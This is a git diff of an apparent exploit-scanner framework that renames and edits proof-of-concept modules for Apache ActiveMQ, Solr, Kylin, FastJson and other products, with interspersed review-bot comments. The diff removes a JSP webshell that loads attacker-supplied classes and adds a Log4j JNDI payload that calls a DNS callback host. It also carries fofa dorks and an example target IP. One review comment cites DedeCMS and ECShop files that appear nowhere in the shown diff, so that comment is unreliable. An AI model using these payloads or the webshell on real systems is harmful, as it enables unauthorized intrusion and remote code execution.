diff --git a/poc/360/TianQing_Unauth_Acceess/__pycache__/poc.cpython-38.pyc b/poc/360/TianQing_Unauth_Acceess/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..9aba519 Binary files /dev/null and b/poc/360/TianQing_Unauth_Acceess/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/360/TianQing_Unauth_Acceess/poc.py b/poc/360/TianQing_Unauth_Acceess/poc.py index c237c20..61ddb68 100644 --- a/poc/360/TianQing_Unauth_Acceess/poc.py +++ b/poc/360/TianQing_Unauth_Acceess/poc.py @@ -9,7 +9,7 @@ urllib3.disable_warnings() class POC(POCBase): - + _info = { "author" : "jijue", # POC作者 diff --git a/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/__pycache__/poc.cpython-38.pyc b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c73dba0 Binary files /dev/null and b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py index 6d005fd..8e01efd 100644 --- a/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py +++ b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "mini_httpd任意文件读取漏洞(CVE-2018-18778)", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "ACME mini_httpd before 1.30", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Alibaba_Druid/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Alibaba_Druid/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b33cf05 Binary files /dev/null and b/poc/Alibaba_Druid/Unauth_Access/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/Alibaba_Druid/Unauth_Access/poc.pyc b/poc/Alibaba_Druid/Unauth_Access/poc.pyc index e220e4e..40f4172 100644 Binary files a/poc/Alibaba_Druid/Unauth_Access/poc.pyc and b/poc/Alibaba_Druid/Unauth_Access/poc.pyc differ diff --git a/poc/Alibaba_FastJson/RCE_CVE_2017_18349/__pycache__/poc.cpython-38.pyc b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..ea21624 Binary files /dev/null and b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/poc.py similarity index 93% rename from poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py rename to poc/Alibaba_FastJson/RCE_CVE_2017_18349/poc.py index a608be5..844adb9 100644 --- a/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py +++ b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/poc.py @@ -9,12 +9,12 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 组件类的漏洞并不适合直接拿到BLEN里批量扫,失败是可以预见的事情,笔者建议的是在渗透过程中将可疑的url拿来测试 + 组件类的漏洞并不适合直接拿到oFx里批量扫,失败是可以预见的事情,笔者建议的是在渗透过程中将可疑的url拿来测试 """, # POC描述,写更新描述,没有就不写 "name" : "Fastjson 反序列化远程代码执行漏洞(CVE-2017-18349)", # 漏洞名称 @@ -36,7 +36,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Alibaba_Nacos/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Alibaba_Nacos/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a34f0fa Binary files /dev/null and b/poc/Alibaba_Nacos/Unauth_Access/__pycache__/poc.cpython-38.pyc differ 
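Review bot: The docstring lines added to `_verify` in the FastJson hunk (`@@ -36,7 +36,9 @@`) state that the no-vulnerability result is `vuln = [False,""]`, but in every `_verify` whose body is fully visible in this diff (the new DedeCMS_织梦/Info_Disclosure_IIS_Short_Filename and ECShop/RCE_2dotX_OR_3dotX files, and the deleted Apache_Kudu one) the negative branch assigns `vuln = [False,req.text]`, so `[False,""]` is only the pre-request default. `_verify`'s body here continues outside the hunk, so I cannot confirm which form this file uses, but the docstring should describe what the code actually returns, e.g. `不存在漏洞:vuln = [False,html_source]` with `""` only when no response was obtained. The same two lines are added in this commit to Apache_ActiveMQ/Physical_Path_Disclosure, Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232 and Apache_ApiSix/Default_Key_CVE_2020_13945, where the same correction applies.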
diff --git a/poc/Alibaba_Nacos/Unauth_Access/poc.pyc b/poc/Alibaba_Nacos/Unauth_Access/poc.pyc index 241e773..4e85445 100644 Binary files a/poc/Alibaba_Nacos/Unauth_Access/poc.pyc and b/poc/Alibaba_Nacos/Unauth_Access/poc.pyc differ diff --git a/poc/Apache_ActiveMQ/Physical_Path_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c4cbfb7 Binary files /dev/null and b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py index 1ed5bc9..62e5041 100644 --- a/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py +++ b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py @@ -9,7 +9,7 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "jijue&&hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-01", # POC创建时间 "UpdateDate" : "2022-01-01", # POC创建时间 @@ -36,7 +36,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d183570 Binary files /dev/null and b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py index db554d1..18a2f0b 100644 --- a/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py +++ b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py 
@@ -14,7 +14,7 @@ class POC(POCBase): "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 略 + 略 """, # POC描述,写更新描述,没有就不写 "name" : "Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)", # 漏洞名称 @@ -27,7 +27,7 @@ class POC(POCBase): """, # 漏洞简要描述 "fofa-dork":""" - + app="APACHE-ActiveMQ" """, # fofa搜索语句 "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 @@ -52,38 +52,7 @@ class POC(POCBase): } filename = random_str() filecontent = random_str() -# filecontent = """ -# <%! -# class ON extends ClassLoader{ -# ON(ClassLoader c){super(c);} -# public Class qualified(byte[] b){ -# return super.defineClass(b, 0, b.length); -# } -# } -# public byte[] interacts(String str) throws Exception { -# Class base64; -# byte[] value = null; -# try { -# base64=Class.forName("sun.misc.BASE64Decoder"); -# Object decoder = base64.newInstance(); -# value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str }); -# } catch (Exception e) { -# try { -# base64=Class.forName("java.util.Base64"); -# Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); -# value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str }); -# } catch (Exception ee) {} -# } -# return value; -# } -# %> -# <% -# String cls = request.getParameter("123"); -# if (cls != null) { -# new ON(this.getClass().getClassLoader()).qualified(interacts(cls)).newInstance().equals(new Object[]{request,response}); -# } -# %> -# """ + try: """ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 diff --git a/poc/Apache_ActiveMQ/WeakPass/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveMQ/WeakPass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c689c98 Binary files /dev/null and b/poc/Apache_ActiveMQ/WeakPass/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..cf2d480 Binary files /dev/null and b/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/__pycache__/poc.cpython-38.pyc b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4b1fc10 Binary files /dev/null and b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py index bc804bc..6ca3d93 100644 --- a/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py +++ b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py @@ -38,7 +38,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/__pycache__/poc.cpython-38.pyc b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e11b92a Binary files /dev/null and b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py index 9b996f6..2ab92eb 100644 --- a/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py +++ b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py @@ -39,7 +39,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] 
diff --git a/poc/Apache_CouchDB/Priv_Escalation_CVE_2017_12635/__pycache__/poc.cpython-38.pyc b/poc/Apache_CouchDB/Priv_Escalation_CVE_2017_12635/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..86fba97
Binary files /dev/null and b/poc/Apache_CouchDB/Priv_Escalation_CVE_2017_12635/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Druid/File_Read_CVE_2021_36749/__pycache__/poc.cpython-38.pyc b/poc/Apache_Druid/File_Read_CVE_2021_36749/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7ace203
Binary files /dev/null and b/poc/Apache_Druid/File_Read_CVE_2021_36749/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/__pycache__/poc.cpython-38.pyc b/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8f26e92
Binary files /dev/null and b/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Flink/RCE_CVE_2020_17518/__pycache__/poc.cpython-38.pyc b/poc/Apache_Flink/RCE_CVE_2020_17518/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..fc690d4
Binary files /dev/null and b/poc/Apache_Flink/RCE_CVE_2020_17518/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Apache_Kudu/Apache_Kudu_UnAuth_Access/poc.py b/poc/Apache_Kudu/Apache_Kudu_UnAuth_Access/poc.py
deleted file mode 100644
index f70674d..0000000
--- a/poc/Apache_Kudu/Apache_Kudu_UnAuth_Access/poc.py
+++ /dev/null
@@ -1,72 +0,0 @@ -# coding:utf-8 -import requests -from lib.core.common import url_handle,get_random_ua -from lib.core.poc import POCBase -# ... -import urllib3 -urllib3.disable_warnings() - -class POC(POCBase): - - _info = { - "author" : "hansi", # POC作者 - "version" : "1", # POC版本,默认是1 - "CreateDate" : "2022-01-10", # POC创建时间 - "UpdateDate" : "2022-01-10", # POC创建时间 - "PocDesc" : """ - 略 - """, # POC描述,写更新描述,没有就不写 - - "name" : "Apache Kudu存在未授权访问漏洞", # 漏洞名称 - "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 - "AppName" : "Apache Kudu未授权访问漏洞", # 漏洞应用名称 - "AppVersion" : "", # 漏洞应用版本 - "VulnDate" : "2022-01-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx - "VulnDesc" : """ - - """, # 漏洞简要描述 - - "fofa-dork":""" - ”Kudu” - """, # fofa搜索语句 - "example" : "http://111.1.10.15:8060/", # 存在漏洞的演示url,写一个就可以了 - "exp_img" : "", # 先不管 - } - - def _verify(self): - """ - 返回vuln - - 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 - - 不存在漏洞:vuln = [False,""] - """ - vuln = [False,""] - url = self.target + "" # url自己按需调整 - - headers = {"User-Agent":get_random_ua(), - "Connection":"close", - "Content-Type": "application/x-www-form-urlencoded", - } - - try: - """ - 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 - """ - req = requests.get(url,headers = headers ,proxies = self.proxy ,timeout = self.timeout,verify = False) - if req.status_code ==200 and "RPCs" in req.text: - vuln = [True,req.text] - else: - vuln = [False,req.text] - except Exception as e: - raise e - - # 以下逻辑酌情使用 - if self._honeypot_check(vuln[1]) == True: - vuln[0] = False - - return vuln - - def _attack(self): - return self._verify() - diff --git a/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/__pycache__/poc.cpython-38.pyc b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..ac686cb Binary files /dev/null and b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py index e89e4b5..0fea246 100644 --- a/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py +++ b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py @@ -17,7 +17,7 @@ class POC(POCBase): 略 """, # POC描述,写更新描述,没有就不写 - "name" : "Apache Kylin 未授权配置泄露 CVE-2020-13937", # 漏洞名称 + "name" : "Apache Kylin 未授权配置泄露(CVE-2020-13937)", # 漏洞名称 "VulnID" : "CVE-2020-13937", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Apache Kylin", # 漏洞应用名称 "AppVersion" : """ @@ -59,7 +59,7 @@ class POC(POCBase): 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if "config" in req.text:#req.status_code == 200 and : + if '{"config":"' in req.text:#req.status_code == 200 and : vuln = [True,req.text] else: vuln = [False,req.text] diff --git a/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/__pycache__/poc.cpython-38.pyc b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2ea091c Binary files /dev/null and b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py index cc8b8b8..6af5175 100644 --- a/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py +++ b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Apache Mod_jk 访问控制权限绕过(CVE-2018-11759)", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Apache Mod_jk", # 漏洞应用名称 "AppVersion" : "Apache Mod_jk Connector 1.2.0 ~ 1.2.44", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx 
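Review bot: The rewritten condition in the Apache_Kylin `@@ -59,7 +59,7 @@` hunk still carries the dead `#req.status_code == 200 and :` fragment on the same line, which now reads as a half-removed check rather than an explanation; either restore it or delete it. Tightening the marker to `'{"config":"'` is a good step against error pages that merely mention "config", and combining it with the status check narrows false positives further, so I would write `if req.status_code == 200 and '{"config":"' in req.text:`. `_verify` starts and ends outside this hunk.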
diff --git a/poc/Apache_Solr/CVE_2019_17558/__pycache__/poc.cpython-38.pyc b/poc/Apache_Solr/CVE_2019_17558/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5c6a954 Binary files /dev/null and b/poc/Apache_Solr/CVE_2019_17558/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Solr/File_Read/__pycache__/poc.cpython-38.pyc b/poc/Apache_Solr/File_Read/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4f5226e Binary files /dev/null and b/poc/Apache_Solr/File_Read/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Solr/File_Read/poc.py b/poc/Apache_Solr/File_Read/poc.py index d35d09a..44ac91f 100644 --- a/poc/Apache_Solr/File_Read/poc.py +++ b/poc/Apache_Solr/File_Read/poc.py @@ -21,7 +21,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Apache Solr 任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Apache Solr", # 漏洞应用名称 "AppVersion" : "Apache Solr <= 8.8.1", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/__pycache__/poc.cpython-38.pyc b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..df20738 Binary files /dev/null and b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py new file mode 100644 index 0000000..6435d44 --- /dev/null +++ b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py 
@@ -0,0 +1,85 @@ +# coding:utf-8 +import requests +import time +from lib.core.common import get_ceye_dns, url_handle,get_random_ua,random_str,verify_ceye_dns +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 该漏洞没有回显,因此POC需要接通dns平台,现已支持知道创宇的ceye,配置位置为项目根目录下的info.ini + 这是笔者针对没有回显的漏洞写的第一个oFx POC,以后不会解释这么多 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Apache Solr 远程命令执行 Log4j", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "Apache Solr", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + Apache Solr引用了Log4j,因为CVE-2021-44228 balabalaba。。我编不出来了,大概的意思懂得都懂 + 笔者最早是在PeiQi看到的,就写了这么个东西 + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + + success,dns_flag = get_ceye_dns() + if success == False: + return [False,dns_flag] + + url = self.target + "/solr/admin/collections?action=$%7bjndi:ldap://"+dns_flag+"%7d&wt=jso" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + + flager = verify_ceye_dns(dns_flag) + + if flager == True: + vuln = [True,dns_flag] + elif flager == False: + vuln = [False,dns_flag] + else: + vuln = [False,flager] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def 
_attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/BSPHP/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/BSPHP/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a8507fd Binary files /dev/null and b/poc/BSPHP/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/BSPHP/Info_Disclosure/poc.py b/poc/BSPHP/Info_Disclosure/poc.py index 20c434a..a0f8b9b 100644 --- a/poc/BSPHP/Info_Disclosure/poc.py +++ b/poc/BSPHP/Info_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "BSPHP 未授权访问 信息泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "BSPHP", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Bithighway_碧海威/Weak_Pass_L7/__pycache__/poc.cpython-38.pyc b/poc/Bithighway_碧海威/Weak_Pass_L7/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..477d82b Binary files /dev/null and b/poc/Bithighway_碧海威/Weak_Pass_L7/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py b/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py index 47b317a..fda7ba5 100644 --- a/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py +++ b/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "碧海威 L7 弱口令漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "碧海威 L7", # 漏洞应用名称 "AppVersion" : "None", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/C_Lodop/File_Read/__pycache__/poc.cpython-38.pyc b/poc/C_Lodop/File_Read/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..04fb58e Binary files /dev/null and b/poc/C_Lodop/File_Read/__pycache__/poc.cpython-38.pyc differ 
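Review bot: In the new Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py, `self._honeypot_check(vuln[1])` near the end of `_verify` is handed `dns_flag` (the DNS token) on both the True and False paths, whereas every other PoC in this diff passes the HTTP response body, so whatever `_honeypot_check` inspects it never sees this target's response; if the check is meant to stay, pass `req.text` to it and keep the token in `vuln[1]`. `import time` is unused, which suggests a delay between the request and `verify_ceye_dns(dns_flag)` was planned and dropped — either use it or remove the import. `except Exception as e: raise e` is a no-op wrapper; a bare `raise` (or no try/except at all) is clearer. The early `return [False,dns_flag]` after `get_ceye_dns()` fails presumably carries an error message in `dns_flag`, which callers cannot tell apart from a clean negative — a one-line comment on that return, or a distinct marker, would help.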
diff --git a/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/__pycache__/poc.cpython-38.pyc b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4944fad Binary files /dev/null and b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py index 899d06b..9e62291 100644 --- a/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py +++ b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "中国移动 禹路由", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/__pycache__/poc.cpython-38.pyc b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d4eef4d Binary files /dev/null and b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py index 45dd5f1..28362b5 100644 --- a/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py +++ b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py 
